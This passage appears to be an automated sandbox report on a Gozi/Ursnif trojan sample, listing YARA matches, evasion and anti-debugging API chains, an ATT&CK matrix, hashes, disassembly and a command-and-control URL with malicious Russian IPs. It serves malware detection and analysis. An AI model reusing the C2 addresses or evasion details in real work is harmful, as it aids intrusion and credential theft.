      Source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00412E5E0_2_00412E5E
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004129C90_2_004129C9
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004135CE0_2_004135CE
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004131FC0_2_004131FC
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004139B60_2_004139B6
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004D1C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_004D1C58
      Source: server.exeReversingLabs: Detection: 35%
      Source: server.exeVirustotal: Detection: 50%
      Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: Yara matchFile source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_0-5374
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end nodegraph_0-5214
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end nodegraph_0-5366

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-5374
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004D092B mov eax, dword ptr fs:[00000030h]0_2_004D092B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004D0D90 mov eax, dword ptr fs:[00000030h]0_2_004D0D90
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00410C7F
      Source: C:\Users\user\Desktop\server.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,0_2_004118DB
      Source: C:\Users\user\Desktop\server.exeCode function: __crtGetLocaleInfoA_stat,0_2_004154FA
      Source: C:\Users\user\Desktop\server.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,0_2_0041089B
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_004D1C58
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation
      Path InterceptionPath Interception1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts11
      Native API
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
      Software Packing
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Remote System Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets114
      System Information Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      server.exe36%ReversingLabsWin32.Trojan.Generic
      server.exe51%VirustotalBrowse
      server.exe100%Joe Sandbox ML
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
      0.2.server.exe.580000.2.unpack100%AviraHEUR/AGEN.1245293Download File
      SourceDetectionScannerLabelLink
      windowsupdatebg.s.llnwi.net0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://62.173.142.51/drew/JmbbhiAvjQPEy2fkKH5/C20MAuPZ3pJbSKGRkKMPd5/SPaafj6VQ7HYu/DXcg7FNf/0ruIDzX_2BCbmxrV40i30pn/_2Fl7_2FNm/RIlbjnVOY4JvDGYwT/ix3pE9ifpnwW/elLfsP9FYx5/Hz_2B8UXu3bbwG/02zNVOFS_2BJ4kciO41Pm/zImHSH7GQInU2lqP/DXjN6xEv0EFAj_2/BIgT9NZXb86r_2B9_2/BglAnU64W/pXOd3Bpq_2B6reFFKiya/vrT62aiDk4ODnu2FLTN/8RaHDJKURayKv5wSn6_2Be/98LSI75Q/Y.jlk0%Avira URL Cloudsafe
      http://94.1030%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      windowsupdatebg.s.llnwi.net
      178.79.225.128
      truefalseunknown
      checklist.skype.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://62.173.142.51/drew/JmbbhiAvjQPEy2fkKH5/C20MAuPZ3pJbSKGRkKMPd5/SPaafj6VQ7HYu/DXcg7FNf/0ruIDzX_2BCbmxrV40i30pn/_2Fl7_2FNm/RIlbjnVOY4JvDGYwT/ix3pE9ifpnwW/elLfsP9FYx5/Hz_2B8UXu3bbwG/02zNVOFS_2BJ4kciO41Pm/zImHSH7GQInU2lqP/DXjN6xEv0EFAj_2/BIgT9NZXb86r_2B9_2/BglAnU64W/pXOd3Bpq_2B6reFFKiya/vrT62aiDk4ODnu2FLTN/8RaHDJKURayKv5wSn6_2Be/98LSI75Q/Y.jlktrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.103server.exe, 00000000.00000002.513808109.000000000228C000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        low
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        62.173.142.51
        unknownRussian Federation
        34300SPACENET-ASInternetServiceProviderRUtrue
        94.103.183.153
        unknownRussian Federation
        197390RATELE-ASRUtrue
        Joe Sandbox Version:37.0.0 Beryl
        Analysis ID:826072
        Start date and time:2023-03-14 10:04:09 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 6s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:server.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@1/2
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 7.1% (good quality ratio 7.1%)
        • Quality average: 89%
        • Quality standard deviation: 15.4%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 18
        • Number of non-executed functions: 12
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 209.197.3.8
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        62.173.142.51server.exeGet hashmaliciousUrsnifBrowse
          server.exeGet hashmaliciousUrsnifBrowse
            94.103.183.153server.exeGet hashmaliciousUrsnifBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              windowsupdatebg.s.llnwi.netserver.exeGet hashmaliciousUrsnifBrowse
              • 95.140.230.192
              file.exeGet hashmaliciousRHADAMANTHYS, lgoogLoaderBrowse
              • 178.79.225.128
              PO-91402278.exeGet hashmaliciousAgentTeslaBrowse
              • 178.79.225.128
              Revised_Proforma_Invoice.exeGet hashmaliciousAgentTeslaBrowse
              • 95.140.230.192
              https://www.appdocusgnrn.com/Get hashmaliciousUnknownBrowse
              • 95.140.230.128
              https://youngersmfg-my.sharepoint.com/:o:/p/morganl/EjVhbkOEEQpCrCtV9dgKPl0BsAntsqExmJGwl54GofmGIQ?e=VQKglhGet hashmaliciousHTMLPhisherBrowse
              • 95.140.230.192
              Vero.htmlGet hashmaliciousUnknownBrowse
              • 178.79.225.0
              https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=4292342187212&EyeblasterID=1086486580&clk=2&ctick=21342&rtu=https%3A%2F%2Fna2signing.web.app/ggrFe5shaBM2x0qgrFe5Fe5ndWO3k17s3RWO3rpdy9s3RWO3BM2Get hashmaliciousHTMLPhisherBrowse
              • 178.79.225.0
              https://baseproductslimited.com/index.html#mancini@astranis.comGet hashmaliciousUnknownBrowse
              • 178.79.225.0
              win.pacGet hashmaliciousUnknownBrowse
              • 178.79.242.0
              ORBAv1KK8C.exeGet hashmaliciousSmokeLoaderBrowse
              • 95.140.236.0
              RFI_NO._2_-_PROVISION_OF_EPCIC_FOR_KCD_ORF.exeGet hashmaliciousFormBookBrowse
              • 178.79.242.128
              Purchase_Enquiry_List.exeGet hashmaliciousAgentTesla, zgRATBrowse
              • 178.79.225.0
              CLkgHWl2wc.exeGet hashmaliciousAgentTesla, zgRATBrowse
              • 95.140.236.128
              z2s0WAHXRp.exeGet hashmaliciousUnknownBrowse
              • 95.140.230.192
              MT103_Halkbank,pdf.exeGet hashmaliciousAgentTeslaBrowse
              • 178.79.225.128
              DHL_Original_Documents..exeGet hashmaliciousUnknownBrowse
              • 178.79.225.0
              Madinat_Zayed_Project_-_GREEN_ECO.vbsGet hashmaliciousUnknownBrowse
              • 178.79.242.0
              LlDYcly3oc.exeGet hashmaliciousRedLineBrowse
              • 178.79.225.0
              5lXC4fzMbvQWIZk.exeGet hashmaliciousAgentTeslaBrowse
              • 95.140.230.192
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              RATELE-ASRUserver.exeGet hashmaliciousUrsnifBrowse
              • 94.103.183.153
              https://drugfreesport.info/lqb4sGet hashmaliciousPhisherBrowse
              • 94.103.183.131
              file.exeGet hashmaliciousAmadey, Raccoon Stealer v2, RedLineBrowse
              • 94.103.183.33
              tdmGGmdqKV.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.33
              Zqtx6ddArE.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.33
              boatnet.arm7.elfGet hashmaliciousUnknownBrowse
              • 94.103.188.36
              boatnet.x86.elfGet hashmaliciousUnknownBrowse
              • 94.103.188.36
              boatnet.arm.elfGet hashmaliciousUnknownBrowse
              • 94.103.188.36
              file.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.197
              file.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.197
              AvS8aoWXxI.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.219
              vdBv52v29c.elfGet hashmaliciousMiraiBrowse
              • 94.103.188.36
              lz47Kwn9w4.elfGet hashmaliciousMiraiBrowse
              • 94.103.188.36
              untODBSHdU.elfGet hashmaliciousMiraiBrowse
              • 94.103.188.36
              2D6T4RxWsP.elfGet hashmaliciousMiraiBrowse
              • 94.103.188.36
              4ISX4nRn8l.elfGet hashmaliciousMiraiBrowse
              • 94.103.188.36
              b2dbec9d623300bf09f55ec179a2b5e4cd5a4c6cea7a5.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.119
              BKrhxR1U4N.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.119
              10A647A3727CA36B57126F6F8985EEE82A511DE435180.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.121
              0CA43AA6F6EAC771BA26730959F10630E43C91BB3BFAF.exeGet hashmaliciousRedLineBrowse
              • 94.103.183.121
              SPACENET-ASInternetServiceProviderRUserver.exeGet hashmaliciousUrsnifBrowse
              • 62.173.142.51
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.142.51
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.236
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.236
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.236
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.141.36
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.141.36
              lQj2udnlAj.exeGet hashmaliciousUrsnifBrowse
              • 62.173.141.36
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.141.36
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.138.6
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.138.6
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.138.6
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.103
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.103
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.103
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.103
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.103
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.103
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.103
              server.exeGet hashmaliciousUrsnifBrowse
              • 62.173.140.103
              No context
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.817599145811235
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:server.exe
              File size:238592
              MD5:7936264575923f443302a9bb14688ab7
              SHA1:ea7a8b4d250529b84bfdfb80785603cee4d07bf9
              SHA256:7efe8c83ab4ba8773421d7f897a1c490214118f7924d5a45868b070cae6899dd
              SHA512:e23ea93f1afe1b99c1a8658d56892e53f2212529982764374b8b28d4da75abc93fe954b45bf4d2ae242817bab8d99b3bd67873b3d3433a8118a5fef7b2a572b6
              SSDEEP:3072:WArj/ix4q2x9pUPG2oOWk4hlwu3DfwT9tYNXhrDPU+ZhGc0Jgamu9A:7iWqspsG5Vplwu3D4T9tChrnEtFmu9
              TLSH:4A348E1273D06871E6324A35BF1BC6B8661EFCA58F5C6BEB23445A2F49711E2CE71341
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aBL...L...L...#...\...#.../...E...G...L...:...#...a...#...M...#...M...RichL...........PE..L......b...........................
              Icon Hash:9aa25a1085929292
              Entrypoint:0x409761
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x620D94EE [Thu Feb 17 00:21:02 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:ae274c29ca15928cb1e23f2e712ba155
              Instruction
              call 00007FA230CC3BBEh
              jmp 00007FA230CBD5DEh
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              test eax, eax
              je 00007FA230CBD764h
              sub eax, 08h
              cmp dword ptr [eax], 0000DDDDh
              jne 00007FA230CBD759h
              push eax
              call 00007FA230CBCD77h
              pop ecx
              pop ebp
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              push esi
              mov esi, ecx
              mov byte ptr [esi+0Ch], 00000000h
              test eax, eax
              jne 00007FA230CBD7B5h
              call 00007FA230CC072Dh
              mov dword ptr [esi+08h], eax
              mov ecx, dword ptr [eax+6Ch]
              mov dword ptr [esi], ecx
              mov ecx, dword ptr [eax+68h]
              mov dword ptr [esi+04h], ecx
              mov ecx, dword ptr [esi]
              cmp ecx, dword ptr [0042D170h]
              je 00007FA230CBD764h
              mov ecx, dword ptr [0042CF28h]
              test dword ptr [eax+70h], ecx
              jne 00007FA230CBD759h
              call 00007FA230CC4598h
              mov dword ptr [esi], eax
              mov eax, dword ptr [esi+04h]
              cmp eax, dword ptr [0042CE30h]
              je 00007FA230CBD768h
              mov eax, dword ptr [esi+08h]
              mov ecx, dword ptr [0042CF28h]
              test dword ptr [eax+70h], ecx
              jne 00007FA230CBD75Ah
              call 00007FA230CC3DF7h
              mov dword ptr [esi+04h], eax
              mov eax, dword ptr [esi+08h]
              test byte ptr [eax+70h], 00000002h
              jne 00007FA230CBD766h
              or dword ptr [eax+70h], 02h
              mov byte ptr [esi+0Ch], 00000001h
              jmp 00007FA230CBD75Ch
              mov ecx, dword ptr [eax]
              mov dword ptr [esi], ecx
              mov eax, dword ptr [eax+04h]
              mov dword ptr [esi+04h], eax
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              mov edi, edi
              push ebp
              mov ebp, esp
              sub esp, 10h
              mov eax, dword ptr [0042C738h]
              xor eax, ebp
